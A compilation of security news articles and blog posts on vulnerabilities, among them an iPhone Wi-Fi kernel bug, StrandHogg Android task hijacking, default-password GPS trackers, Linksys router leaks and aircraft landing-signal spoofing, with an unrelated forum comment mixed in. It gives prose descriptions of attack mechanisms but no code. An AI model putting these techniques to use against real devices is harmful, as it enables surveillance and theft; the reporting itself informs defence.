Impressive iPhone Exploit

Impressive iPhone Exploit

This is a scarily impressive vulnerability:

Earlier this year, Apple patched one of the most breathtaking iPhone vulnerabilities ever: a memory corruption bug in the iOS kernel that gave attackers remote access to the entire device­ — over Wi-Fi, with no user interaction required at all. Oh, and exploits were wormable­ — meaning radio-proximity exploits could spread from one nearby device to another, once again, with no user interaction needed.

[…]

Beer’s attack worked by exploiting a buffer overflow bug in a driver for AWDL, an Apple-proprietary mesh networking protocol that makes things like Airdrop work. Because drivers reside in the kernel — ­one of the most privileged parts of any operating system­ — the AWDL flaw had the potential for serious hacks. And because AWDL parses Wi-Fi packets, exploits can be transmitted over the air, with no indication that anything is amiss.

[…]

Beer developed several different exploits. The most advanced one installs an implant that has full access to the user’s personal data, including emails, photos, messages, and passwords and crypto keys stored in the keychain. The attack uses a laptop, a Raspberry Pi, and some off-the-shelf Wi-Fi adapters. It takes about two minutes to install the prototype implant, but Beer said that with more work a better written exploit could deliver it in a “handful of seconds.” Exploits work only on devices that are within Wi-Fi range of the attacker.

There is no evidence that this vulnerability was ever used in the wild.

EDITED TO ADD: Slashdot thread.

Tracking Users on Waze

Tracking Users on Waze

A security researcher discovered a wulnerability in Waze that breaks the anonymity of users:

I found out that I can visit Waze from any web browser at waze.com/livemap so I decided to check how are those driver icons implemented. What I found is that I can ask Waze API for data on a location by sending my latitude and longitude coordinates. Except the essential traffic information, Waze also sends me coordinates of other drivers who are nearby. What caught my eyes was that identification numbers (ID) associated with the icons were not changing over time. I decided to track one driver and after some time she really appeared in a different place on the same road.

The vulnerability has been fixed. More interesting is that the researcher was able to de-anonymize some of the Waze users, proving yet again that anonymity is hard when we’re all so different.

Sidebar photo of Bruce Schneier by Joe MacInnis.

NSA Advisory on Chinese Government Hacking

NSA Advisory on Chinese Government Hacking

The NSA released an advisory listing the top twenty-five known vulnerabilities currently being exploited by Chinese nation-state attackers.

This advisory provides Common Vulnerabilities and Exposures (CVEs) known to be recently leveraged, or scanned-for, by Chinese state-sponsored cyber actors to enable successful hacking operations against a multitude of victim networks. Most of the vulnerabilities listed below can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks. The majority of the products are either for remote access (T1133) or for external web services (T1190), and should be prioritized for immediate patching.

Sidebar photo of Bruce Schneier by Joe MacInnis.

Hacking Apple for Profit

Hacking Apple for Profit

Five researchers hacked Apple Computer’s networks — not their products — and found fifty-five vulnerabilities. So far, they have received $289K.

One of the worst of all the bugs they found would have allowed criminals to create a worm that would automatically steal all the photos, videos, and documents from someone’s iCloud account and then do the same to the victim’s contacts.

Lots of details in this blog post by one of the hackers.

Sidebar photo of Bruce Schneier by Joe MacInnis.

Hacking a Coffee Maker

Hacking a Coffee Maker

As expected, IoT devices are filled with vulnerabilities:

As a thought experiment, Martin Hron, a researcher at security company Avast, reverse engineered one of the older coffee makers to see what kinds of hacks he could do with it. After just a week of effort, the unqualified answer was: quite a lot. Specifically, he could trigger the coffee maker to turn on the burner, dispense water, spin the bean grinder, and display a ransom message, all while beeping repeatedly. Oh, and by the way, the only way to stop the chaos was to unplug the power cord.

[…]

In any event, Hron said the ransom attack is just the beginning of what an attacker could do. With more work, he believes, an attacker could program a coffee maker — ­and possibly other appliances made by Smarter — ­to attack the router, computers, or other devices connected to the same network. And the attacker could probably do it with no overt sign anything was amiss.

Sidebar photo of Bruce Schneier by Joe MacInnis.

New Bluetooth Vulnerability

New Bluetooth Vulnerability

There’s a new unpatched Bluetooth vulnerability:

The issue is with a protocol called Cross-Transport Key Derivation (or CTKD, for short). When, say, an iPhone is getting ready to pair up with Bluetooth-powered device, CTKD’s role is to set up two separate authentication keys for that phone: one for a “Bluetooth Low Energy” device, and one for a device using what’s known as the “Basic Rate/Enhanced Data Rate” standard. Different devices require different amounts of data — and battery power — from a phone. Being able to toggle between the standards needed for Bluetooth devices that take a ton of data (like a Chromecast), and those that require a bit less (like a smartwatch) is more efficient. Incidentally, it might also be less secure.

According to the researchers, if a phone supports both of those standards but doesn’t require some sort of authentication or permission on the user’s end, a hackery sort who’s within Bluetooth range can use its CTKD connection to derive its own competing key. With that connection, according to the researchers, this sort of erzatz authentication can also allow bad actors to weaken the encryption that these keys use in the first place — which can open its owner up to more attacks further down the road, or perform “man in the middle” style attacks that snoop on unprotected data being sent by the phone’s apps and services.

Another article:

Patches are not immediately available at the time of writing. The only way to protect against BLURtooth attacks is to control the environment in which Bluetooth devices are paired, in order to prevent man-in-the-middle attacks, or pairings with rogue devices carried out via social engineering (tricking the human operator).

However, patches are expected to be available at one point. When they’ll be, they’ll most likely be integrated as firmware or operating system updates for Bluetooth capable devices.

The timeline for these updates is, for the moment, unclear, as device vendors and OS makers usually work on different timelines, and some may not prioritize security patches as others. The number of vulnerable devices is also unclear and hard to quantify.

Many Bluetooth devices can’t be patched.

Final note: this seems to be another example of simultaneous discovery:

According to the Bluetooth SIG, the BLURtooth attack was discovered independently by two groups of academics from the École Polytechnique Fédérale de Lausanne (EPFL) and Purdue University.

2017 Tesla Hack

1&1~=UmmSeptember 4, 2020 4:25 AM

@Elnac:

“Batteries are made in China/India, so it’s not a ollution people see, or think about.”

Elon Musk gets bateries from where?

“From the battery manufacturing to its currently inexistant recycling.”

There is some recycling currently going on in the West. In part it’s from splitting battery packs down and pulling out bad cells and reusing the good cells. For some reason that is not understood as well as many would hope the lifetime on lithium cells is very variable and in some cases as much as 5:1. Which is why it is cost effective for people building their own “PowerWalls” to buy up both used vehicle cells and used computer cells. As for more industrial style “recycling” as with most recycling it’s actually ‘market driven’ that is currently there is no market for the recycled parts with sufficient profit for the usual Asian operations to get involved. But,

“Most electric cars take between 300.000 and 500.000km to even out their pollution with older diesel/gasoline ones, just because of the enormous initial pollution to produce the lithium, and electronics.”

I think you need to compare like with like European studies have shown that the average family car takes ~25years of usage to repay it’s “Manufacturing polution” offset. Which in the case of both iron and aluminium require a very very large electrical input for the smelting process so much so infact that for many years Aluminium smelting was only carried out in areas with lots of low cost electricity that was produced by hydroelectric generation. The studies of interest were carried out before electronic engine managment and it’s consequent ‘extra polution’ became prevalent.

The real issue between electric and IC vehicles is actually two fold. Firstly the inefficiencies of total drive chain from storage to vehical movment. Even with the old heavy lead acid batteries used in “delivery vehicles” having nearly no mechanical drive chain tipped the balance in favour of electric vehicles. Secondly though was and still remains the issues of fueling. An IC engined vehicle can be ‘charged’ in a matter of minutes, whilst batteries can take hours to sizeable fractions of a day. If you were to try to replace the current fossil fuels with another source of chemical energy the chances are you would not be alowed to do so due to health, safety, and environmental protection legislation. The ‘Petro-Chem’ industry with regards vehicle fuels would not be alowed to exist if the legislation in place today was in place a little over a century ago. Thus the IC engine is not playing on a level playing field and thus leads a ‘charmed existance’.

But talking about fuel transportation, whilst finding figures on ‘loss’ for the electrical/mains grid is not particularly difficult, finding simillar for petro-chem / fossil fuels is very difficult as it’s more or less kept ‘hidden’. The reason is most electrical grid transmission loss is ‘heat’ which whilst it is the ultimate form of pollution is nowhere near as dangerous as the chemical ‘loss’ ditectly into the environment, most chemical energy sources are toxic (including those we eat) and so just dumping them into the environment is a very bad idea.

But you mention coal etc used for electricity generation but you do not mention the refining process of fossil fuels and the immense polution issues involved.

We could endlessly bat individual parts of the ‘from sunlight to motion’ chain backwards and forwards, but in most cases that would be like arguing what effect the colour of ‘the lipstick on the pig’ has on the taste of the sausages or the quantity of squeal in the process.

You need to consider the entire chain from ‘sunlight to motion’ and compare them side by side. If you did you might find that the real joker in the pack is the petro-chem industry from ‘hole in the ground to vehicle storage’ as far as polution is concerned.

Intel will soon bake anti-malware defenses directly into its CPUs

A mobile PC processor code-named Tiger Lake. It will be the first CPU to offer a security capability known as Control-Flow Enforcement Technology.

Enlarge / A mobile PC processor code-named Tiger Lake. It will be the first CPU to offer a security capability known as Control-Flow Enforcement Technology.
Intel

The history of hacking has largely been a back-and-forth game, with attackers devising a technique to breach a system, defenders constructing a countermeasure that prevents the technique, and hackers devising a new way to bypass system security. On Monday, Intel is announcing its plans to bake a new parry directly into its CPUs that’s designed to thwart software exploits that execute malicious code on vulnerable computers.

Control-Flow Enforcement Technology, or CET, represents a fundamental change in the way processors execute instructions from applications such as Web browsers, email clients, or PDF readers. Jointly developed by Intel and Microsoft, CET is designed to thwart a technique known as return-oriented programming, which hackers use to bypass anti-exploit measures software developers introduced about a decade ago. While Intel first published its implementation of CET in 2016, the company on Monday is saying that its Tiger Lake CPU microarchitecture will be the first to include it.

ROP, as return-oriented programming is usually called, was software exploiters’ response to protections such as Executable Space Protection and address space layout randomization, which made their way into Windows, macOS, and Linux a little less than two decades ago. These defenses were designed to significantly lessen the damage software exploits could inflict by introducing changes to system memory that prevented the execution of malicious code. Even when successfully targeting a buffer overflow or other vulnerability, the exploit resulted only in a system or application crash, rather than a fatal system compromise.

ROP allowed attackers to regain the high ground. Rather than using malicious code written by the attacker, ROP attacks repurpose functions that benign applications or OS routines have already placed into a region of memory known as the stack. The “return” in ROP refers to use of the RET instruction that’s central to reordering the code flow.

Very effective

Alex Ionescu, a veteran Windows security expert and VP of engineering at security firm CrowdStrike, likes to say that if a benign program is like a building made of Lego bricks that were built in a specific sequence, ROP uses the same Lego pieces but in a different order. In so doing, ROP converts the building into a spaceship. The technique is able to bypass the anti-malware defenses because it uses memory-resident code that’s already permitted to be executed.

CET introduces changes in the CPU that create a new stack called the control stack. This stack can’t be modified by attackers and doesn’t store any data. It stores the return addresses of the Lego bricks that are already in the stack. Because of this, even if an attacker has corrupted a return address in the data stack, the control stack retains the correct return address. The processor can detect this and halt execution.

“Because there is no effective software mitigation against ROP, CET will be very effective at detecting and stopping this class of vulnerability,” Ionescu told me. “Previously, operating systems and security solutions had to guess or infer that ROP had happened, or perform forensic analysis, or detect the second stage payloads/effect of the exploit.”

Not that CET is limited to defenses against ROP. CET provides a host of additional protections, some of which thwart exploitation techniques known as jump-oriented programming and call-oriented programming, to name just two. ROP, however, is among the most interesting aspects of CET.

Those who do not remember the past

Intel has built other security functions into its CPUs with less-than-stellar results. One is Intel’s SGX, short for Software Guard eXtension, which is supposed to carve out impenetrable chunks of protected memory for security-sensitive functions such as the creation of cryptographic keys. Another security add-on from Intel is known as the Converged Security and Management Engine, or simply the Management Engine. It’s a subsystem inside Intel CPUs and chipsets that implements a host of sensitive functions, among them the firmware-based Trusted Platform Module used for silicon-based encryption, authentication of UEFI BIOS firmware, and the Microsoft System Guard and BitLocker.

A steady stream of security flaws discovered in both CPU-resident features, however, has made them vulnerable to a variety of attacks over the years. The most recent SGX vulnerabilities were disclosed just last week.

It’s tempting to think that CET will be similarly easy to defeat, or worse, will expose users to hacks that wouldn’t be possible if the protection hadn’t been added. But Joseph Fitzpatrick, a hardware hacker and a researcher at SecuringHardware.com, says he’s optimistic CET will perform better. He explained:

One distinct difference that makes me less skeptical of this type of feature versus something like SGX or ME is that both of those are “adding on” security features, as opposed to hardening existing features. ME basically added a management layer outside the operating system. SGX adds operating modes that theoretically shouldn’t be able to be manipulated by a malicious or compromised operating system. CET merely adds mechanisms to prevent normal operation—returning to addresses off the stack and jumping in and out of the wrong places in code—from completing successfully. Failure of CET to do its job only allows normal operation. It doesn’t grant the attacker access to more capabilities.

Once CET-capable CPUs are available, the protection will work only when the processor is running an operating system with the necessary support. Windows 10 Version 2004 released last month provides that support. Intel still isn’t saying when Tiger Lake CPUs will be released. While the protection could give defenders an important new tool, Ionescu and fellow researcher Yarden Shafir have already devised bypasses for it. Expect them to end up in real-world attacks within the decade.

Google fixes Android flaws that allow code execution with high system rights

Google fixes Android flaws that allow code execution with high system rights

Google has shipped security patches for dozens of vulnerabilities in its Android mobile operating system, two of which could allow hackers to remotely execute malicious code with extremely high system rights.

In some cases, the malware could run with highly elevated privileges, a possibility that raises the severity of the bugs. That’s because the bugs, located in the Android System component, could enable a specially crafted transmission to execute arbitrary code within the context of a privileged process. In all, Google released patches for at least 34 security flaws, although some of the vulnerabilities were present only in devices available from manufacturer Qualcomm.

Anyone with a mobile device should check to see if fixes are available for their device. Methods differ by device model, but one common method involves either checking the notification screen or clicking Settings > Security > Security update. Unfortunately, patches aren’t available for many devices.

Two vulnerabilities ranked as critical in Google’s June security bulletin are indexed as CVE-2020-0117 and CVE-2020-8597. They’re among four System flaws located in the Android system (the other two are ranked with a severity of high). The critical vulnerabilities reside in Android versions 8 through the most recent release of 11.

“These vulnerabilities could be exploited through multiple methods such as email, web browsing, and MMS when processing media files,” an advisory from the Department of Homeland Security-funded Multi-State-Information Sharing and Analysis Center said. “Depending on the privileges associated with the application, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

Vulnerabilities with a severity rating of high affected the Android media framework, the Android framework, and the Android kernel. Other vulnerabilities were contained in components shipped in devices from Qualcomm. The two Qualcomm-specific critical flaws reside in closed source components. The severity of other Qualcomm flaws were rated as high.

Vulnerability in fully patched Android phones under active attack by bank thieves

Vulnerability in fully patched Android phones under active attack by bank thieves

A vulnerability in millions of fully patched Android phones is being actively exploited by malware that’s designed to drain the bank accounts of infected users, researchers said on Monday.

The vulnerability allows malicious apps to masquerade as legitimate apps that targets have already installed and come to trust, researchers from security firm Promon reported in a post. Running under the guise of trusted apps already installed, the malicious apps can then request permissions to carry out sensitive tasks, such as recording audio or video, taking photos, reading text messages or phishing login credentials. Targets who click yes to the request are then compromised.

Researchers with Lookout, a mobile security provider and a Promon partner, reported last week that they found 36 apps exploiting the spoofing vulnerability. The malicious apps included variants of the BankBot banking trojan. BankBot has been active since 2017, and apps from the malware family have been caught repeatedly infiltrating the Google Play Market.

The vulnerability is most serious in versions 6 through 10, which (according to Statista) account for about 80% of Android phones worldwide. Attacks against those versions allow malicious apps to ask for permissions while posing as legitimate apps. There’s no limit to the permissions these malicious apps can seek. Access to text messages, photos, the microphone, camera, and GPS are some of the permissions that are possible. A user’s only defense is to click “no” to the requests.

An affinity for multitasking

The vulnerability is found in a function known as TaskAffinity, a multitasking feature that allows apps to assume the identity of other apps or tasks running in the multitasking environment. Malicious apps can exploit this functionality by setting the TaskAffinity for one or more of its activities to match a package name of a trusted third-party app. By either combining the spoofed activity with an additional allowTaskReparenting activity or launching the malicious activity with an Intent.FLAG_ACTIVITY_NEW_TASK, the malicious apps will be placed inside and on top of the targeted task.

“Thus the malicious activity hijacks the target’s task,” Promon researchers wrote. “The next time the target app is launched from Launcher, the hijacked task will be brought to the front and the malicious activity will be visible. The malicious app then only needs to appear like the target app to successfully launch sophisticated attacks against the user. It is possible to hijack such a task before the target app has even been installed.”

Promon said Google has removed malicious apps from its Play Market, but, so far, the vulnerability appears to be unfixed in all versions of Android. Promon is calling the vulnerability “StrandHogg,” an old Norse term for the Viking tactic of raiding coastal areas to plunder and hold people for ransom. Neither Promon nor Lookout identified the names of the malicious apps. That omission makes it hard for people to know if they are or were infected.

Google representatives didn’t respond to questions about when the flaw will be patched, how many Google Play apps were caught exploiting it, or how many end users were affected. The representatives wrote only:

“We appreciate the researchers[‘] work, and have suspended the potentially harmful apps they identified. Google Play Protect detects and blocks malicious apps, including ones using this technique. Additionally, we’re continuing to investigate in order to improve Google Play Protect’s ability to protect users against similar issues.”

StrandHogg represents the biggest threat to less-experienced users or those who have cognitive or other types of impairments that make it hard to pay close attention to subtle behaviors of apps. Still, there are several things alert users can do to detect malicious apps that attempt to exploit the vulnerability. Suspicious signs include:

  • An app or service that you’re already logged into is asking for a login.
  • Permission popups that don’t contain an app name.
  • Permissions asked from an app that shouldn’t require or need the permissions it asks for. For example, a calculator app asking for GPS permission.
  • Typos and mistakes in the user interface.
  • Buttons and links in the user interface that do nothing when clicked on.
  • Back button does not work as expected.

Tip-off from a Czech bank

Promon researchers said they identified StrandHogg after learning from an unnamed Eastern European security company for financial institutions that several banks in the Czech Republic reported money disappearing from customer accounts. The partner gave Promon a sample of suspected malware. Promon eventually found that the malware was exploiting the vulnerability. Promon partner Lookout later identified the 36 apps exploiting the vulnerability, including BankBot variants.

Monday’s post didn’t say how many financial institutions were targeted in total.

The malware sample Promon analyzed was installed through several droppers apps and downloaders distributed on Google Play. While Google has removed them, it’s not uncommon for new malicious apps to make their way into the Google-operated service. Update: In an email sent after this post went live, a Lookout representative said none of the 36 apps it found was available in Google Play.

Readers are once again reminded to be highly suspicious of Android apps available both in and outside of Google Play. People should also pay close attention to permissions requested by any app.

Critical Flaws in VNC Threaten Industrial Environments

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

News Wrap: Amazon Ring Risks, Stalkerware, and D-Link Router Flaws

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

Google Will Award $1M-Plus to People Who Can Hack Titan M Security Chip

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

Microsoft Outlook for Android Bug Opens Door to XSS

The administrator of your personal data will be Threatpost, Inc., 500 Unicorn Park, Woburn, MA 01801. Detailed information on the processing of personal data can be found in the privacy policy. In addition, you will find them in the message confirming the subscription to the newsletter.

600,000 GPS trackers for people and pets are using 123456 as a password

Dog plush toy with tracker attached.

Shenzhen i365 Tech

An estimated 600,000 GPS trackers for monitoring the location of kids, seniors, and pets contain vulnerabilities that open users up to a host of creepy attacks, researchers from security firm Avast have found.

The $25 to $50 devices are small enough to wear on a necklace or stash in a pocket or car dash compartment. Many also include cameras and microphones. They’re marketed on Amazon and other online stores as inexpensive ways to help keep kids, seniors, and pets safe. Ignoring the ethics of attaching a spying device to the people we love, there’s another reason for skepticism. Vulnerabilities in the T8 Mini GPS Tracker Locator and almost 30 similar model brands from the same manufacturer, Shenzhen i365 Tech, make users vulnerable to eavesdropping, spying, and spoofing attacks that falsify users’ true location.

Researchers at Avast Threat Labs found that ID numbers assigned to each device were based on its International Mobile Equipment Identity, or IMEI. Even worse, during manufacturing, devices were assigned precisely the same default password of 123456. The design allowed the researchers to find more than 600,000 devices actively being used in the wild with that password. As if that wasn’t bad enough, the devices transmitted all data in plaintext using commands that were easy to reverse engineer.

The result: people who are on the same network as the smartphone or Web-based app can monitor or modify sensitive traffic. One command that might come in handy sends a text message to a phone of the attacker’s choice. An attacker can use it to obtain the phone number tied to a specific account. From there, attackers on the same network could change the GPS coordinates the tracker was reporting or force the device to call a number of the attacker’s choice and broadcast any sound within range of its microphone. Other commands allowed devices to return to their original factory settings, including the default password, or to install attacker-chosen firmware.

Another command allows attackers to change the IP address of the server that the tracker communicates with. The Avast researchers exploited the weakness to set up a man-in-the-middle attack that allowed them to permanently control the device. From that point on, attackers would no longer need to be connected to the same network as the smartphone or Web app. They would be able to view and modify all plaintext passing through their proxy.

A diagram of the man-in-the-middle attack that allowed Avast researchers to divert GPS tracking data through a rogue server.

Enlarge / A diagram of the man-in-the-middle attack that allowed Avast researchers to divert GPS tracking data through a rogue server.
Avast

The researchers also determined that all data traveling between the GSM network to the cloud server was not only unencrypted but also unauthenticated. The only thing tying the device down was its IMEI. The researchers said they privately notified the vendor of the T8 Mini GPS tracker of the vulnerabilities on June 24 and never got a response. Attempts by Ars to reach company representatives were unsuccessful.

In a blog post scheduled to go live Thursday morning, the Avast researchers identified 29 generic model names of a subset of the 600,000 Internet-connected trackers they found using a default password. They are:

T58
A9
T8S
T28
TQ
A16
A6
3G
A18
A21
T28A
A12
A19
A20
A20S
S1
P1
FA23
A107
RomboGPS
PM01
A21P
PM02
A16X
PM03
WA3
P1-S
S6
S9

GPS trackers can provide protection and peace of mind in the right cases, which at a minimum require fully informed consent of the people being tracked. But the Avast research demonstrates how the capabilities of these devices can cut both ways and make users more vulnerable than if they used no protection at all. People who have bought one of the vulnerable devices should stop using it at once.

>20,000 Linksys routers leak historic record of every device ever connected

>20,000 Linksys routers leak historic record of every device ever connected

This post has been updated to add comments Linksys made online, which says company researchers couldn’t reproduce the information disclosure exploit on routers that installed a patch released in 2014. Representatives of Belkin, the company that acquired Linksys in 2013, didn’t respond to the request for comment that Ars sent on Monday. Ars saw the statement only after this article went live.

More than 20,000 Linksys wireless routers are regularly leaking full historic records of every device that has ever connected to them, including devices’ unique identifiers, names, and the operating systems they use. The data can be used by snoops or hackers in either targeted or opportunistic attacks.

Troy Mursch

Independent researcher Troy Mursch said the leak is the result of a flaw in almost three dozen models of Linksys routers. It took about 25 minutes for the BinaryEdge search engine of Internet-connected devices to find 21,401 vulnerable devices on Friday. A scan earlier in the week found 25,617. They were leaking a total of 756,565 unique MAC addresses. Exploiting the flaw requires only a few lines of code that harvest every MAC address, device name, and operating system that has ever connected to each of them.

The flaw allows snoops or hackers to assemble disparate pieces of information that most people assume aren’t public. By combining a historical record of devices that have connected to a public IP addresses, marketers, abusive spouses, and investigators can track the movements of people they want to track. The disclosure can also be useful to hackers. The Shadowhammer group, for instance, recently infected as many as 1 million people after hacking the software update mechanism of computer maker ASUS. The hackers then used a list of about 600 MAC addresses of specific targets that, if infected, would receive advanced stages of the malware.

Got admin?

Besides handing out device information, vulnerable routers also leak whether their default administrative passwords have been changed. The scan Mursch performed earlier this week found about 4,000 of the vulnerable devices were still using the default password. The routers, he said, have remote access enabled by default and can’t be turned off as a workaround, because it’s required for an accompanying Linksys App to function.

That scenario makes it easy for hackers to quickly scan for devices that can be remotely taken over. Hackers can then obtain the Wi-Fi SSID password in plaintext, change DNS settings to send connected devices to malicious addresses, or carry out a range of other compromises. A recent attack group known as the BlackTech Group likely used similar router attacks to install the Plead backdoor on targeted computers.

Mursch told Ars that his tests show that devices are vulnerable even when their firewall is turned on. He also said that devices continue to leak even after running a patch Linksys issued in 2014.

Mursch said he disclosed the information leakage publicly after he privately reported it to Linksys officials and they closed the issue after determining it “Not applicable / Won’t fix.” Ars emailed press representatives of Belkin, the company that acquired Linksys in 2013, seeking comment earlier this week and never received a response.

In a statement published Tuesday, one day after Mursch’s post went live, Linksys representatives wrote:

Linksys responded to a vulnerability submission from Bad Packets on May 7th, 2019 regarding a potential sensitive information disclosure flaw: CVE-2014-8244 (which was fixed in 2014). We quickly tested the router models flagged by Bad Packets using the latest publicly available firmware (with default settings) and have not been able to reproduce CVE-2014-8244; meaning that it is not possible for a remote attacker to retrieve sensitive information via this technique. JNAP commands are only accessible to users connected to the router’s local network. We believe that the examples provided by Bad Packets are routers that are either using older versions of firmware or have manually disabled their firewalls. Customers are highly encouraged to update their routers to the latest available firmware and check their router security settings to ensure the firewall is enabled.

As mentioned above, Mursch said the 2014 patch failed to fix the vulnerability on the routers he tested, even when the firewall was turned on. The existence of 20,000 to 25,000 actively leaking routers suggest many people have either failed to apply the patch or that the patch doesn’t always work.

The list of vulnerable devices released by Mursch is here. An image is also below:

Troy Mursch

People using one of these devices would do well to test if it is leaking device history to the Internet even after installing the 2014 update. It is, users should either replace the router with a newer model or replace the Linksys firmware with a third-party offering such as OpenWrt.

The radio navigation planes use to land safely is insecure and can be hacked

A plane in the researchers' demonstration attack as spoofed ILS signals induce a pilot to land to the right of the runway.

Enlarge / A plane in the researchers’ demonstration attack as spoofed ILS signals induce a pilot to land to the right of the runway.
Sathaye et al.

Just about every aircraft that has flown over the past 50 years—whether a single-engine Cessna or a 600-seat jumbo jet—is aided by radios to safely land at airports. These instrument landing systems (ILS) are considered precision approach systems, because unlike GPS and other navigation systems, they provide crucial real-time guidance about both the plane’s horizontal alignment with a runway and its vertical angle of descent. In many settings—particularly during foggy or rainy night-time landings—this radio-based navigation is the primary means for ensuring planes touch down at the start of a runway and on its centerline.

Like many technologies built in earlier decades, the ILS was never designed to be secure from hacking. Radio signals, for instance, aren’t encrypted or authenticated. Instead, pilots simply assume that the tones their radio-based navigation systems receive on a runway’s publicly assigned frequency are legitimate signals broadcast by the airport operator. This lack of security hasn’t been much of a concern over the years, largely because the cost and difficulty of spoofing malicious radio signals made attacks infeasible.

Now, researchers have devised a low-cost hack that raises questions about the security of ILS, which is used at virtually every civilian airport throughout the industrialized world. Using a $600 software defined radio, the researchers can spoof airport signals in a way that causes a pilot’s navigation instruments to falsely indicate a plane is off course. Normal training will call for the pilot to adjust the plane’s descent rate or alignment accordingly and create a potential accident as a result.

One attack technique is for spoofed signals to indicate that a plane’s angle of descent is more gradual than it actually is. The spoofed message would generate what is sometimes called a “fly down” signal that instructs the pilot to steepen the angle of descent, possibly causing the aircraft to touch the ground before reaching the start of the runway.

The video below shows a different way spoofed signals can pose a threat to a plane that is in its final approach. Attackers can send a signal that causes a pilot’s course deviation indicator to show that a plane is slightly too far to the left of the runway, even when the plane is perfectly aligned. The pilot will react by guiding the plane to the right and inadvertently steer over the centerline.

[embedded content]
Wireless Attacks on Aircraft Landing Systems.

The researchers, from Northeastern University in Boston, consulted a pilot and security expert during their work, and all are careful to note that this kind of spoofing isn’t likely to cause a plane to crash in most cases. ILS malfunctions are a known threat to aviation safety, and experienced pilots receive extensive training in how to react to them. A plane that’s misaligned with a runway will be easy for a pilot to visually notice in clear conditions, and the pilot will be able to initiate a missed approach fly-around.

Another reason for measured skepticism is the difficulty of carrying out an attack. In addition to the SDR, the equipment needed would likely require directional antennas and an amplifier to boost the signal. It would be hard to sneak all that gear onto a plane in the event the hacker chose an onboard attack. If the hacker chose to mount the attack from the ground, it would likely require a great deal of work to get the gear aligned with a runway without attracting attention. What’s more, airports typically monitor for interference on sensitive frequencies, making it possible an attack would be shut down shortly after it started.

In 2012, Researcher Brad Haines, who often goes by the handle Rendermanexposed vulnerabilities in the automatic dependent surveillance broadcast—the broadcast systems planes use to determine their location and broadcast it to others. He summed up the difficulties of real-world ILS spoofing this way:

If everything lined up for this, location, concealment of gear, poor weather conditions, a suitable target, a motivated, funded and intelligent attacker, what would their result be? At absolute worst, a plane hits the grass and some injuries or fatalities are sustained, but emergency crews and plane safety design means you’re unlikely to have a spectacular fire with all hands lost. At that point, airport landings are suspended, so the attacker can’t repeat the attack. At best, pilot notices the misalignment, browns their shorts, pulls up and goes around and calls in a maintenance note that something is funky with the ILS and the airport starts investigating, which means the attacker is not likely wanting to stay nearby.

So if all that came together, the net result seems pretty minor. Compare that to the return on investment and economic effect of one jackass with a $1,000 drone flying outside Heathrow for 2 days. Bet the drone was far more effective and certain to work than this attack.

Still, the researchers said that risks exist. Planes that aren’t landing according to the glide path—the imaginary vertical path a plane follows when making a perfect landing—are much harder to detect even when visibility is good. What’s more, some high-volume airports, to keep planes moving, instruct pilots to delay making a fly-around decision even when visibility is extremely limited. The Federal Aviation Administration’s Category III approach operations, which are in effect for many US airports, call for a decision height of just 50 feet, for instance. Similar guidelines are in effect throughout Europe. Those guidelines leave a pilot with little time to safely abort a landing should a visual reference not line up with ILS readings.

“Detecting and recovering from any instrument failures during crucial landing procedures is one of the toughest challenges in modern aviation,” the researchers wrote in their paper, titled Wireless Attacks on Aircraft Instrument Landing Systems, which has been accepted at the 28th USENIX Security Symposium. “Given the heavy reliance on ILS and instruments in general, malfunctions and adversarial interference can be catastrophic especially in autonomous approaches and flights.”

What happens with ILS failures

Several near-catastrophic landings in recent years demonstrate the danger posed from ILS failures. In 2011, Singapore Airlines flight SQ327, with 143 passengers and 15 crew aboard, unexpectedly banked to the left about 30 feet above a runway at the Munich airport in Germany. Upon landing, the Boeing 777-300 careened off the runway to the left, then veered to the right, crossed the centerline, and came to a stop with all of its landing gear in the grass to the right of the runway. The image directly below shows the aftermath. The image below that depicts the course the plane took.

An instrument landing system malfunction caused Singapore Airlines flight SQ327 to slide off the runway shortly after landing in Munich in 2011.

Enlarge / An instrument landing system malfunction caused Singapore Airlines flight SQ327 to slide off the runway shortly after landing in Munich in 2011.

The path Singapore Airlines flight SQ327 took after landing.

Enlarge / The path Singapore Airlines flight SQ327 took after landing.

An incident report published by Germany’s Federal Bureau of Aircraft Accident Investigation said that the jet missed its intended touch down point by about 1,600 feet. Investigators said one contributor to the accident was localizer signals that had been distorted by a departing aircraft. While there were no reported injuries, the event underscored the severity of ILS malfunctions. Other near-catastrophic accidents involving ILS failures are an Air New Zealand flight NZ 60 in 2000 and a Ryanair flight FR3531 in 2013. The following video helps explain what went wrong in the latter event.

[embedded content]
Animation – Stick shaker warning and Pitch-up Upsets.

Vaibhav Sharma runs global operations for a Silicon Valley security company and has flown small aviation airplanes since 2006. He is also a licensed Ham Radio operator and volunteer with the Civil Air Patrol, where he is trained as a search-and-rescue flight crew and radio communications team member. He’s the pilot controlling the X-Plane flight simulator in the video demonstrating the spoofing attack that causes the plane to land to the right of the runway.

Sharma told Ars:

This ILS attack is realistic but the effectiveness will depend on a combination of factors including the attacker’s understanding of the aviation navigation systems and conditions in the approach environment. If used appropriately, an attacker could use this technique to steer aircraft towards obstacles around the airport environment and if that was done in low visibility conditions, it would be very hard for the flight crew to identify and deal with the deviations.

He said the attacks had the potential to threaten both small aircraft and large jet planes but for different reasons. Smaller planes tend to move at slower speeds than big jets. That gives pilots more time to react. Big jets, on the other hand, typically have more crew members in the cockpit to react to adverse events, and pilots typically receive more frequent and rigorous training.

The most important consideration for both big and small planes, he said, is likely to be environmental conditions, such as weather at the time of landing.

“The type of attack demonstrated here would probably be more effective when the pilots have to depend primarily on instruments to execute a successful landing,” Sharma said. “Such cases include night landings with reduced visibility or a combination of both in a busy airspace requiring pilots to handle much higher workloads and ultimately depending on automation.”

Aanjhan Ranganathan, a Northeastern University researcher who helped develop the attack, told Ars that GPS systems provide little fallback when ILS fails. One reason: the types of runway misalignments that would be effective in a spoofing attack typically range from about 32 feet to 50 feet, since pilots or air traffic controllers will visually detect anything bigger. It’s extremely difficult for GPS to detect malicious offsets that small. A second reason is that GPS spoofing attacks are relatively easy to carry out.

